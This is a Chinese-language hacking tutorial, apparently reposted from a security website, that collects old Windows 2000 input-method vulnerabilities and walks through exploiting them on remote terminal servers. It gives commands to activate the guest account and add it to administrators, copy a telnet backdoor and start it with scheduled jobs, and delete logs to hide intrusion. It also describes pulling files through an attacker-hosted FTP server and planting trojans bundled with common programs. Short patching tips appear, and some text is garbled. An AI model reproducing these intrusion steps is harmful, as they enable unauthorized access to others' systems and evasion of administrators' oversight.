2023年12月1日发(作者:) 输入法

输入法漏洞是一个很经典的漏洞,相信大家以前零零散散都玩过,本人总结了下出现了的几个输入法漏洞,再配合以前一些经典入侵的事例。希望对大家有所帮助,或许在入侵过程中有用呢,说明:本人只是做个总结,以上引用了不少大侠的文章



<<全拼输入法漏洞入侵>>

一,获得管理员账号:

我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。



用右键点击状态条上的微软徽标,弹出"帮助"(如果发现"帮助"呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开"帮助"一栏中"操作指南",在最上面的任务栏点击右键,会弹出一个菜单,打开"跳至URL"。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入"c:winntsystem32"。然后按"确定",于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。



现在我们要获得一个账号,成为系统的合法用户。在该目录下到"",为""创建一个快捷方式,右键点击该快捷方式,在"属性"-;"目标"-;c:winntsystem32 后面空一格,填入"user guest /active :yes"点"确定"。这一步骤目的在于用激活被禁止使用的guest账户,当然也可以利用"user 用户名 密码/add",创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入"user guest 密码",运行,于是guest便有了密码。最后,再次修改,填入"localgroup administrators guest /add,将guest变成系统管理员。



二,创建跳板:

再次登录终端用务器,以"guest"身份进入,此时guest已是系统管理员,已具备一切可执行权。打开"控制面板",进入"网络和拔号连接",在"本地接"或"拔号连接"中查看属性,看对方是否选择"Microsoft 网络的文件和打印机共享",如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号网络共享才会打开。



退出对方系统,在本地机命令提示符下,输入net use IP AddressIPC$ ["password"] /user:"guset",通过IPC的远程登陆就成功了。

登陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.

exe,另外,还有,一会要用),这个程序是在对方上面开一个Telnet服务,端口是99。



copy c: ***.***.***.***admin$然后利用定时服务启动它,先了解对方的时间:net time ***.***.***.***

显示:***.***.***.*** 的当前时间是 2001/1/8 下午 08:55 命令成功完成。然后启动:at

***.***.***.*** 09:00



显示:新加了一项作业,其作业 ID = 0过几分钟后,

telnet***.***.***.*** 99

这里不需要验证身份,直接登录,显示:c:winnt:system32

我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入:copy c:hack

211.21.193.202admin$

把事先存放在hack目录里的拷过去。然后又回到刚才的telnet窗口,运行

C:WINNTsystem32;ntlm

显示:

Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.

Done!

C:WINNTsystem32;

C:WINNTsystem32;



好,现在我们来启动WIN2000本身的telnet,首先终止的telnet服务:net stop telnet 系统告诉你并没有启动telnet,不理它,继续:net start telnet 这次娴钠舳ue1f6藅elnet,我们可以在另开的命令提示符窗口telnet到对方的23端口,验证身份,输入我们的guest账号和密码,它就真正成为我们的跳板了。我们可以利用它到其它的主机去。



三、扫除脚印:

删除为 创建的快捷方式,删除winntsystem32logfiles下边的日志文件

补漏方法:

1、打补丁

2、删除输入法帮助文件

3、停止终端服务。





<<利用"紫光拼音输入法"漏洞入侵>>

按下了shift+ctrl(切换输入法)紫光拼音的输入法!再用右键一点,帮助出来了。轻车熟路的点击帮助里的"打印",选择"打印选定主题",双击"添加打印机",弹出向导,点击"下一步" 选择"网络打印机",next,选"连接到internet或......",随便填上"2313123",next,出错提示,嘿嘿,点击"帮助",哈哈,"web帮助",唉?我亲爱的"打开url"选项哪里去了??????? 看来补丁真的很有效,只有在internet选项上打主意了。



回到输入法的帮助窗口,点击选项里的"internet选项",看看...... 改主页什么设置很没意思,IE的安全性也帮不上什么忙,嘿,有了! 在"隐私"项里有"导入"的功能(或者在"常规"项的"辅助功能"里的"使用样式表编排文档格式"的"浏览")按钮,点击后就出来一个"打开"窗口,文件类型选择成"所有文件",这时候我们就有了硬盘的system权限啦,可以删除、改名文件,设置共享、web共享。哈哈哈......嗯,别忙着得意,浏览器



还是出不来,我们也就无法进入控制面板、管理工具,最可恨的是我们没有打开文件的权限!虽然有恶作剧式的删除所有文件的权限,但是我们的目标是......没有蛀牙~靠

!多隆,关门,放狗!应该是admin组的权限嘛。



我们首先要做到的是目标机器和本地机器文件的传输,做到这一点,就可以从容的修改文件了,不能远程打开就本地打开嘛,是不?上传下载文件有两种方法,一是利用已有权限设置共享目录(当然是everyone权限的),二是利用FTP。前一种方法容易受到防火墙的限制,所以我用的是第二种方法。



什么?对方没开FTP?我靠,你不会开啊!我的OS是win2k server,很容易开了一个ftp服务,当然是匿名登陆的,任何人登陆都可以有读写的权限。这样就可以在"打开"窗口里的文件名一栏填入

FTP://222.222.222.222 (222.222.222.222是我的IP)



来进入我的FTP目录了,需要注意的是,如果当前目录是C:,就会提示找不到路径 "C:FTP://222.222.222.222"

所以,我们要先选择到"我的电脑",在敲入FTP地址,就不会出现这样的问题了

然后就可以在"打开"窗口里像操作远程目录一样操作我的FTP目录了,使用复制、粘贴功能上传、下载文件。



现在我们已经可以做到修改任意没有被服务锁定的文件啦!也就是说,这个网站已经基本上在我们的掌握之中了,修改其主页轻而易举,甚至可以使用"web共享"功能建立自己的新站。



接下来我就第一时间通知了该站的网管,删除紫光的*.CHM帮助文件修补漏洞。 当然,为了获得进一步权限,我们还可以往里面放木马(最好是先下载远程的比较常用的可执行文件,然后和木马捆绑起来再上传回去。)不推荐冰河等木马,因为会轻易被防火墙捕捉到,最好是一些自动打开telnet服务、自动添加admin组帐号等工具。 等到对方中了标,不明不白的开了telnet服务后,我们就有了system的shell,就可以添加admin组的帐号了,添加过程可以参看我前面写的教程或其他相关教程。



事情完结后,不禁又是一番感慨,本来这个网站是没有输入法漏洞的,大概是打全了补丁,管理员就有些大意,装了新的输入法也没有想到会不会有新的漏洞出现。

紫光拼音确实是一个很好的输入法,我也很喜欢,没想到却带来这么大的隐患,见网络安全的脆弱性,作为管理员,真是一丝也不可大意啊...!





<<智能ABC输入法的两个漏洞>>



漏洞一 :

这个漏洞很老了,估计大家都知道了, 它两年以前就出来了,我还是将它一起写出来吧。

首先,切换到智能ABC输入法状态,依次输入"V","←""DEL""Enter",就会出现错误窗口并强迫关闭当前窗口。这个漏洞出来后,有很多人将它用到免费上网上去,的确那时的网吧管理软件的处理能力很差,很容易中招,不过现在这个的网吧管理软件基本

已经补好这个漏洞了。



漏洞二.

这个漏洞是我以前发现的,一直没有公布。它和第一个一样也是"V"扰的祸,

只不过方法有些不同而已。首先还是切换ABC输入法状态输入>=2个任何字母(其中首尾两个字母不是"v"),然后再利用退格键将光标拉倒第一个字母后(其实只要不是在一个字母后最后一个字母后就行),再输入"v",然后再将输入的"V"前的字母删掉,再按2次空格键就会出现和漏洞一一样的错误窗口,当然有时按2次没有出现时就多按几次,直到错误窗口出来为止。





<<极品五笔输入法漏洞>>

极品五笔也可以调出帮助菜单( 经典的漏洞,后面大家都知道怎么做了,不重复了)现在好象只有5.0版本的没有这个漏洞 ,其它版本都存在漏洞这个漏洞只在本地有用,远程连接调不出来。



本篇文章来源于 黑基网-中国最大的网络安全站点 原文链接:/lib/2006-02-21/